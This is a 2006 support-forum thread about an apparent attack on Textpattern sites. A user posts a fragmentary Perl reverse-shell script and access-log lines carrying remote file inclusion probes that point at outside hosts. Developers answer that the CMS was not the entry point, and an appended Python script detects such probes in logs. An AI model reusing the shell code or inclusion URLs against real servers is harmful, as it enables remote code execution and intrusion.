Textpattern CMS support forum
Textpattern Hacked / Vulnerability!
My hosting company just took my server down because there was a remote attack on all my Textpattern sites.
The attackers brought down their servers. Most Textpattern installs are 4.03 and some are still 4.01.
They shut down the webserver and have me upgrade to the latest version 4.0.4. Does the new version prevent remote execution of publish.php?
Below is the log file and the hack file:
<code>
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";ec [unreadable bytes in the archived post]
[unreadable bytes in the archived post] Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET" [rest of the file is unreadable in the archived post]
</code>
Log file
<code>
81.215.254.22 - - [27/Oct/2006:12:29:18 -0500] "POST /textpattern/publish.php?txpcfg[txpath]=http://hbags.com/c57.txt?cmd=id HTTP/1.1" 200 24287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.215.254.22 - - [27/Oct/2006:12:29:29 -0500] "POST /textpattern/publish.php?txpcfg[txpath]=http://hbags.com/c57.txt?cmd=id HTTP/1.1" 200 24354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.215.254.22 - - [27/Oct/2006:12:29:42 -0500] "POST /textpattern/publish.php?txpcfg[txpath]=http://hbags.com/c57.txt?cmd=id HTTP/1.1" 200 23081 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.215.254.22 - - [27/Oct/2006:12:30:06 -0500] "POST /textpattern/publish.php?txpcfg[txpath]=http://hbags.com/c57.txt?cmd=id HTTP/1.1" 200 23103 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
81.215.254.22 - - [27/Oct/2006:12:30:11 -0500] "POST /textpattern/publish.php?txpcfg[txpath]=http://hbags.com/c57.txt?cmd=id HTTP/1.1" 200 24354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
</code>
Re: Textpattern Hacked / Vulnerability!
4.0.4 is not vulnerable to this attack.
What version of TXP were you using on your website?
Re: Textpattern Hacked / Vulnerability!
Just found in one install that I didn’t uncomment this:
#php_value register_globals 0
Was this the loophole?
Thanks
Re: Textpattern Hacked / Vulnerability!
Probably. Though that line isn’t part of the default .htaccess file that TXP supplies (as far as I know).
You should have register_globals disabled anyway. Not just for Textpattern.
If you want to disable outside access to publish.php and other files that should not be called directly, have a look at this thread
Last edited by ruud (2006-10-27 20:56:33)
#5 2006-10-27 21:22:07
- zem
- Developer Emeritus

- From: Melbourne, Australia
- Registered: 2004-04-08
- Posts: 2,579
Re: Textpattern Hacked / Vulnerability!
Textpattern 4.0.x is not vulnerable to this attack even with register globals turned on. All versions of Textpattern 4.0 prevent direct execution of publish.php.
The “attack code” you posted appears to be unrelated to the attempts you’re seeing in your Textpattern logs.
Most likely, something else on your server was hacked. Whatever happened, it wasn’t caused by those POST requests.
Last edited by zem (2006-10-27 21:41:15)
Alex
#6 2006-10-27 21:44:12
- zem
- Developer Emeritus

- From: Melbourne, Australia
- Registered: 2004-04-08
- Posts: 2,579
Re: Textpattern Hacked / Vulnerability!
Thread closed temporarily while we investigate. In the meantime, please see the FAQ.
Alex
#7 2006-10-28 22:23:42
- zem
- Developer Emeritus

- From: Melbourne, Australia
- Registered: 2004-04-08
- Posts: 2,579
Re: Textpattern Hacked / Vulnerability!
Update: no evidence so far that Textpattern was hacked. Still waiting on a response from the hosting company.
Alex
#8 2006-10-31 01:32:14
- zem
- Developer Emeritus

- From: Melbourne, Australia
- Registered: 2004-04-08
- Posts: 2,579
Re: Textpattern Hacked / Vulnerability!
The hosting company now says Textpattern wasn’t hacked (at least, not the 4.0.3 copy – there may have been another install of g1.19, which does have a security problem).
It’s not clear exactly what happened, because the account had a number of scripts installed, several of which have had vulnerabilities in the past.
Alex
#9 2006-10-31 23:55:22
- GPH
- New Member
- Registered: 2006-09-20
- Posts: 5
Re: Textpattern Hacked / Vulnerability!
I was just about to ask this in a new thread. I’m running 4.0.4 and lately have been seeing this type of entry in my logs:
article/4//textpattern/publish.php?txpcfg[txpath]=http://realhack.altervista.org/iniez.txt?
Is this anything to be worried about?
Thanks
#10 2006-11-01 00:03:03
- GPH
- New Member
- Registered: 2006-09-20
- Posts: 5
Re: Textpattern Hacked / Vulnerability!
Sorry, I’ve just read the FAQ link.
On the diagnostic I do have this pre-flight msg…
The following PHP functions (which may be necessary to run Textpattern) are disabled on your server:: ini_alter,system,passthru,shell_exec,leak,listen,chgrp,apache_setenv,define_syslog_variables,openlog,syslog,ftp_exec
Are these safe to have disabled?
Last edited by GPH (2006-11-01 08:46:20)
Re: Textpattern Hacked / Vulnerability!
Yes. I don’t think TXP uses any of those.
Pages: 1
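Added example, not part of the original thread and not Textpattern's own code: a log check for the request pattern shown in the first post and in post #9, where a query parameter such as `txpcfg[txpath]` carries a remote URL, including the URL-encoded form. The sample log lines, IP addresses and host name are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache combined log format: client, identd, user, [time], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# A parameter value that starts with a remote URL scheme.
REMOTE_VALUE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation IPs and a .test host), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Oct/2006:12:29:18 -0500] "POST /textpattern/publish.php?txpcfg[txpath]=http://files.example.test/x.txt?cmd=id HTTP/1.1" 200 24287 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [27/Oct/2006:12:29:29 -0500] "GET /article/4//textpattern/publish.php?txpcfg%5Btxpath%5D=http%3A%2F%2Ffiles.example.test%2Fx.txt%3F HTTP/1.1" 404 512 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [27/Oct/2006:12:31:02 -0500] "GET /article/4/some-title?ref=http HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [27/Oct/2006:12:31:05 -0500] "GET /index.php?id=4 HTTP/1.1" 200 8800 "-" "Mozilla/5.0"',
]


def remote_url_params(target):
    """Return [(name, value)] for query parameters whose value is a remote URL."""
    query = target.partition('?')[2]
    pairs = (p.partition('=') for p in query.split('&'))
    decoded = ((unquote(n), unquote(v)) for n, _, v in pairs)
    return [(n, v) for n, v in decoded if REMOTE_VALUE_RE.match(v)]


def scan(lines):
    """Return one finding per remote-URL parameter seen in the log lines."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        for name, value in remote_url_params(m['target']):
            # A 200 only means the server answered; it is not evidence that
            # the remote file was included.
            findings.append({'ip': m['ip'], 'status': int(m['status']),
                             'path': m['target'].partition('?')[0],
                             'param': name, 'value': value})
    return findings


def summarize(findings):
    """Count probes per (client IP, parameter) so repeated attempts stand out."""
    return Counter((f['ip'], f['param']) for f in findings)
```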